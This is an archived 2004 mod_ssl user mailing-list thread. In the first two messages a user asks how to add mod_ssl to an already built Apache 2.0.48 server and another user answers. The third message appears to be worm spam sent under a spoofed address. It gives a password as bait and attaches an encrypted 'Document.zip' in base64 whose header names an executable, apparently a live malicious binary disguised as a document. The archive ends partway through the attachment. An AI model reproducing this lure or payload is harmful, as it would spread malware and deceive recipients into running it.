X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 05E09A897A; Tue, 23 Mar 2004 16:33:20 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from voyager.coretrek.no (voyager.coretrek.no [212.33.142.2])
	by master.modssl.org (Postfix) with ESMTP id F3969A893A
	for ; Tue, 23 Mar 2004 16:33:19 +0100 (CET)
Received: from localhost (localhost [127.0.0.1])
	by voyager.coretrek.no (Postfix) with ESMTP id 0A9CF57D4
	for ; Tue, 23 Mar 2004 16:33:17 +0100 (CET)
Received: from LAPTOPEM (cD9089419.inet.catch.no [217.8.148.25])
	by voyager.coretrek.no (Postfix) with ESMTP id 2FEE657DF
	for ; Tue, 23 Mar 2004 16:33:13 +0100 (CET)
From: "Evert Meulie" 
To: 
Subject: Is it possible to 'add' mod_ssl later on, without recompiling all of Apache?
Date: Tue, 23 Mar 2004 16:33:11 +0100
Organization: Telio AS
MIME-Version: 1.0
Content-Type: text/plain;
	charset="utf-8"
Content-Transfer-Encoding: quoted-printable
X-Mailer: Microsoft Office Outlook, Build 11.0.5510
X-MimeOLE: Produced By Microsoft MimeOLE V6.00.2800.1165
Thread-Index: AcQQ4PKQAUv1riK1QeiGGspKoAonFQ==
Message-Id: <20040323153313.2FEE657DF@voyager.coretrek.no>
X-Virus-Scanned: by AMaViS perl-11
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: "Evert Meulie" 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

Hi!

The following case: A apache-2.0.48 server which was compiled without =
SSL. Now
the powers that be have decided the server should also be able to =
support
https, so mod_ssl needs to be 'added'.

Is it possible to do this without recompiling/reinstalling all of =
Apache? How
do I proceed?


Regards,
	Evert

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 23 17:02:09 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 7DADDA89B8; Tue, 23 Mar 2004 17:02:09 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from cr.toftum.org (cpe.atm2-0-1021150.0x50a3cb26.arcnxx16.customer.tele.dk [80.163.203.38])
	by master.modssl.org (Postfix) with ESMTP id 51441A8945
	for ; Tue, 23 Mar 2004 17:01:49 +0100 (CET)
Received: by cr.toftum.org (Postfix, from userid 1000)
	id D81085E0368; Tue, 23 Mar 2004 17:01:47 +0100 (CET)
Date: Tue, 23 Mar 2004 17:01:47 +0100
From: Mads Toftum 
To: modssl-users@modssl.org
Subject: Re: Is it possible to 'add' mod_ssl later on, without recompiling all of Apache?
Message-ID: <20040323160147.GA8282@gw>
Mail-Followup-To: modssl-users@modssl.org
References: <20040323153313.2FEE657DF@voyager.coretrek.no>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <20040323153313.2FEE657DF@voyager.coretrek.no>
X-Mailer: mutt
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: Mads Toftum 
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

On Tue, Mar 23, 2004 at 04:33:11PM +0100, Evert Meulie wrote:
> Hi!
> 
> The following case: A apache-2.0.48 server which was compiled without SSL. Now
> the powers that be have decided the server should also be able to support
> https, so mod_ssl needs to be 'added'.
> 
> Is it possible to do this without recompiling/reinstalling all of Apache? How
> do I proceed?
> 
In theory it should be possible if you have mod_so built in already (httpd -l 
should list mod_so). But it is certainly much simpler just to rebuild apache
with --enable-ssl. In a standard build, there will be a build/ directory with
the file config.nice that contains all the options originally used to build
apache.

vh

Mads Toftum
-- 
`Darn it, who spiked my coffee with water?!' - lwall

______________________________________________________________________
Apache Interface to OpenSSL (mod_ssl)                   www.modssl.org
User Support Mailing List                      modssl-users@modssl.org
Automated List Manager                            majordomo@modssl.org

From owner-modssl-users@modssl.org  Tue Mar 23 17:59:28 2004
Return-Path: 
X-Original-To: modssl-users-L
Delivered-To: modssl-users-L@master.modssl.org
Received: by master.modssl.org (Postfix, from userid 4003)
	id 80C13A89A3; Tue, 23 Mar 2004 17:59:28 +0100 (CET)
X-Original-To: modssl-users@modssl.org
Delivered-To: modssl-users@modssl.org
Received: from choi22 (ip-r-bkkSP7-55.C.loxinfo.net.th [169.210.4.55])
	by master.modssl.org (Postfix) with SMTP id B93D4A898B
	for ; Tue, 23 Mar 2004 17:59:11 +0100 (CET)
Date: Tue, 23 Mar 2004 23:58:47 +0700
To: modssl-users@modssl.org
Subject: ^_^ meay-meay!
From: rse@engelschall.com
Message-ID: 
MIME-Version: 1.0
Content-Type: multipart/mixed;
        boundary="--------jipbaewkoevdlubhqfhn"
Sender: owner-modssl-users@modssl.org
Precedence: bulk
Reply-To: modssl-users@modssl.org
X-Sender: rse@engelschall.com
X-List-Manager: Majordomo [version 1.94.5]
X-List-Name: modssl-users

----------jipbaewkoevdlubhqfhn
Content-Type: text/plain; charset="us-ascii"
Content-Transfer-Encoding: 7bit

Looking  forward for a  response :P

..btw, "68104" is a  password  for archive

----------jipbaewkoevdlubhqfhn
Content-Type: application/octet-stream; name="Document.zip"
Content-Transfer-Encoding: base64
Content-Disposition: attachment; filename="Document.zip"

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
